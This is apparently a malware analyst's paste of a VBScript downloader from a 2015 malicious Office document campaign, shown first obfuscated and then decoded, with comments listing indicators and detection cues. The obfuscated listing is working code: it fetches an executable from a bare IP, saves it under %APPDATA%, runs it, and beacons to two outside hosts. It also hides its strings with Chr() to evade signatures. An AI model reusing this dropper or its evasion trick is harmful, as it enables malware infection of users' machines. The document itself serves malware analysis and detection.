bartblaze

Deobfuscated VBscript

May 8th, 2015
  1. Obfuscated + deobfuscated VBscript used in latest Office maldoc campaign.
  2. Related blog post: http://bartblaze.blogspot.com/2015/05/new-malicious-office-docs-trick.html
  3.  
  4.  
  5. <== obfuscated: ===>
  ' Stage-1 downloader from the Office maldoc campaign described in the blog post linked above.
  ' Apart from the first URL, every string the script needs -- the COM ProgIDs, the APPDATA
  ' variable name, the dropped file name, the WMI query and the two beacon URLs -- is assembled
  ' from Chr() calls, so plain-text signatures on "Microsoft.XMLHTTP", "Adodb.Stream" or
  ' "Win32_Process" do not match the file on disk. The "deobfuscated" section of this paste
  ' shows each Chr() sequence decoded.
  ' The use of the WScript object (WScript.CreateObject, WScript.Sleep) means this runs under
  ' the Windows Script Host (wscript.exe / cscript.exe), i.e. the document wrote it to disk first.
  '
  ' Observed indicators: 91.227.18.18 (/stat/get.php, payload source); %APPDATA%\o8237423.exe
  ' (dropped file and expected process name); savepic.org/7260406.jpg and savepic.net/6856149.jpg
  ' (contacted after the drop and after the payload starts; their responses are never used).
  ' Detection angle: a script host spawned from an Office process that writes an .exe under
  ' %APPDATA%, performs a GET to a bare IP, and queries Win32_Process via WMI.
  '
  ' Stage 1: HTTP client and binary stream for the payload download.
  ' The Chr() sequences decode to "Microsoft.XMLHTTP" and "Adodb.Stream".
  6. dim HGyu87f7Usf: Set HGyu87f7Usf = createobject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) )
  7. dim oUIOGuiwefff: Set oUIOGuiwefff = createobject(Chr(65) & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109) )
  ' Synchronous (False = not async) GET of the payload; this is the only URL left in clear text.
  8. HGyu87f7Usf.Open "GET", "http://91.227.18.18/stat/get.php", False
  9. HGyu87f7Usf.Send
  ' Stage 2: read %APPDATA% from the process environment block ("WScript.Shell",
  ' Environment("Process"), then "APPDATA") and build the drop path.
  ' Line 12 decodes to <APPDATA>\o8237423.exe; VBScript's + on strings concatenates.
  10. Set dfgfderer = WScript.CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108) ).Environment(Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115) )
  11. iyUGbuwerff = dfgfderer(Chr(65) & Chr(80) & Chr(80) & Chr(68) & Chr(65) & Chr(84) & Chr(65) )
  12. iyUGUIvbuiwe7vhJ = iyUGbuwerff + Chr(92) & Chr(111) & Chr(56) & Chr(50) & Chr(51) & Chr(55) & Chr(52) & Chr(50) & Chr(51) & Chr(46) & Chr(101) & Chr(120) & Chr(101)  
  ' Write the raw HTTP response body to disk. type = 1 is adTypeBinary; the second
  ' argument of savetofile, 2, is adSaveCreateOverWrite (an existing file is replaced).
  13. with oUIOGuiwefff
  14.    .type = 1  
  15.     .open
  16.     .write HGyu87f7Usf.responseBody
  17.     .savetofile iyUGUIvbuiwe7vhJ, 2  
  18. end with
  ' Stage 3: launch the dropped executable through "Shell.Application".Open.
  19. Set uyGUYhi8wef = CreateObject(Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110) )
  20. uyGUYhi8wef.Open iyUGUIvbuiwe7vhJ
  21.  
  ' Stage 4: GET http://savepic.org/7260406.jpg. The stream object jhvHVKfdg is created but
  ' never referenced again and the response body is never read, so this appears to be a
  ' "download succeeded" beacon rather than a second payload (inferred from the code, not confirmed).
  22. dim JHyygUBjdfg: Set JHyygUBjdfg = createobject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) )
  23. dim jhvHVKfdg: Set jhvHVKfdg = createobject(Chr(65) & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109) )
  24. JHyygUBjdfg.Open Chr(71) & Chr(69) & Chr(84) , Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(115) & Chr(97) & Chr(118) & Chr(101) & Chr(112) & Chr(105) & Chr(99) & Chr(46) & Chr(111) & Chr(114) & Chr(103) & Chr(47) & Chr(55) & Chr(50) & Chr(54) & Chr(48) & Chr(52) & Chr(48) & Chr(54) & Chr(46) & Chr(106) & Chr(112) & Chr(103) , False
  25. JHyygUBjdfg.Send
  26.  
  ' Stage 5: connect to WMI ("winmgmts:\\.\root\cimv2") and poll "Select * from Win32_Process"
  ' every 3 seconds (WScript.Sleep 3000) until a process named o8237423.exe exists,
  ' i.e. until the dropped payload is actually running.
  27. Set fdhtrewfwef = GetObject(Chr(119) & Chr(105) & Chr(110) & Chr(109) & Chr(103) & Chr(109) & Chr(116) & Chr(115) & Chr(58) & Chr(92) & Chr(92) & Chr(46) & Chr(92) & Chr(114) & Chr(111) & Chr(111) & Chr(116) & Chr(92) & Chr(99) & Chr(105) & Chr(109) & Chr(118) & Chr(50) )
  28. Do
  29. Running = False
  30. Set colItems = fdhtrewfwef.ExecQuery(Chr(83) & Chr(101) & Chr(108) & Chr(101) & Chr(99) & Chr(116) & Chr(32) & Chr(42) & Chr(32) & Chr(102) & Chr(114) & Chr(111) & Chr(109) & Chr(32) & Chr(87) & Chr(105) & Chr(110) & Chr(51) & Chr(50) & Chr(95) & Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115) )
  31. For Each objItem In colItems
  32. If objItem.Name = Chr(111) & Chr(56) & Chr(50) & Chr(51) & Chr(55) & Chr(52) & Chr(50) & Chr(51) & Chr(46) & Chr(101) & Chr(120) & Chr(101)  Then
  33. Running = True
  34. Exit For
  35. End If
  36. Next
  37. If Not Running Then
  38. WScript.Sleep 3000
  39. End If
  40. Loop While Not Running
  ' Stage 6: GET http://savepic.net/6856149.jpg once the payload is running. As in stage 4,
  ' the stream dsfsdfsdfg is never used and the response is ignored (an "execution confirmed"
  ' beacon, inferred).
  41. dim sdfsdfsdf: Set sdfsdfsdf = createobject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) )
  42. dim dsfsdfsdfg: Set dsfsdfsdfg = createobject(Chr(65) & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109) )
  43. sdfsdfsdf.Open Chr(71) & Chr(69) & Chr(84) , Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(115) & Chr(97) & Chr(118) & Chr(101) & Chr(112) & Chr(105) & Chr(99) & Chr(46) & Chr(110) & Chr(101) & Chr(116) & Chr(47) & Chr(54) & Chr(56) & Chr(53) & Chr(54) & Chr(49) & Chr(52) & Chr(57) & Chr(46) & Chr(106) & Chr(112) & Chr(103) , False
  44. sdfsdfsdf.Send
  45.  
  46.  
  45.  
  46.  
  47. =========================================================================================================
  48.  
  49.  
  50.  
  51. <== deobfuscated: ===>
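  ' Decoded form of the obfuscated listing above: every Chr() sequence has been replaced by
  ' the string it produces. The strings are shown without quotes, so this text is a reading
  ' aid and not itself runnable VBScript. What the script does, in order:
  '   1. GET http://91.227.18.18/stat/get.php with Microsoft.XMLHTTP (synchronous),
  '   2. write the response body to %APPDATA%\o8237423.exe via Adodb.Stream and open it
  '      with Shell.Application (the payload is executed),
  '   3. GET http://savepic.org/7260406.jpg -- the response is never read,
  '   4. poll WMI (root\cimv2, Select * from Win32_Process) every 3 s until a process
  '      named o8237423.exe exists,
  '   5. GET http://savepic.net/6856149.jpg -- the response is never read.
  ' Steps 3 and 5 look like download/execution beacons (the stream objects jhvHVKfdg and
  ' dsfsdfsdfg are created but unused); that is an inference from the code.
  ' The WScript object (WScript.CreateObject, WScript.Sleep) means this runs under the
  ' Windows Script Host, so the maldoc had to drop the script to disk before running it.
  ' Line 75 on the original page read "Running = Falsepasteb" (page text leaked into the
  ' listing); it is restored here to "Running = False", matching line 29 of the obfuscated source.
  '
  ' Stage 1: payload download.
  52. dim HGyu87f7Usf: Set HGyu87f7Usf = createobject(Microsoft.XMLHTTP )
  53. dim oUIOGuiwefff: Set oUIOGuiwefff = createobject(Adodb.Stream )
  54. HGyu87f7Usf.Open "GET", "http://91.227.18.18/stat/get.php", False
  55. HGyu87f7Usf.Send
  ' Stage 2: resolve %APPDATA% from the process environment block and build the drop path
  ' (<APPDATA>\o8237423.exe).
  56. Set dfgfderer = WScript.CreateObject(WScript.Shell ).Environment(Process )
  57. iyUGbuwerff = dfgfderer(APPDATA )
  58. iyUGUIvbuiwe7vhJ = iyUGbuwerff + \o8237423.exe
  ' Binary stream (type = 1, adTypeBinary) saved with mode 2 (adSaveCreateOverWrite).
  59. with oUIOGuiwefff
  60.    .type = 1
  61.     .open
  62.     .write HGyu87f7Usf.responseBody
  63.     .savetofile iyUGUIvbuiwe7vhJ, 2
  64. end with
  ' Stage 3: execute the dropped file.
  65. Set uyGUYhi8wef = CreateObject(Shell.Application )
  66. uyGUYhi8wef.Open iyUGUIvbuiwe7vhJ
  67.  
  ' Stage 4: first beacon; jhvHVKfdg is never used and the response is discarded.
  68. dim JHyygUBjdfg: Set JHyygUBjdfg = createobject(Microsoft.XMLHTTP )
  69. dim jhvHVKfdg: Set jhvHVKfdg = createobject(Adodb.Stream )
  70. JHyygUBjdfg.Open GET , http://savepic.org/7260406.jpg , False
  71. JHyygUBjdfg.Send
  72.  
  ' Stage 5: wait until the payload process is visible to WMI, retrying every 3 seconds.
  73. Set fdhtrewfwef = GetObject(winmgmts:\\.\root\cimv2 )
  74. Do
  75. Running = False
  76. Set colItems = fdhtrewfwef.ExecQuery(Select * from Win32_Process )
  77. For Each objItem In colItems
  78. If objItem.Name = o8237423.exe  Then
  79. Running = True
  80. Exit For
  81. End If
  82. Next
  83. If Not Running Then
  84. WScript.Sleep 3000
  85. End If
  86. Loop While Not Running
  ' Stage 6: second beacon once the payload is running; dsfsdfsdfg is unused, response discarded.
  87. dim sdfsdfsdf: Set sdfsdfsdf = createobject(Microsoft.XMLHTTP )
  88. dim dsfsdfsdfg: Set dsfsdfsdfg = createobject(Adodb.Stream )
  89. sdfsdfsdf.Open GET , http://savepic.net/6856149.jpg , False
  90. sdfsdfsdf.Send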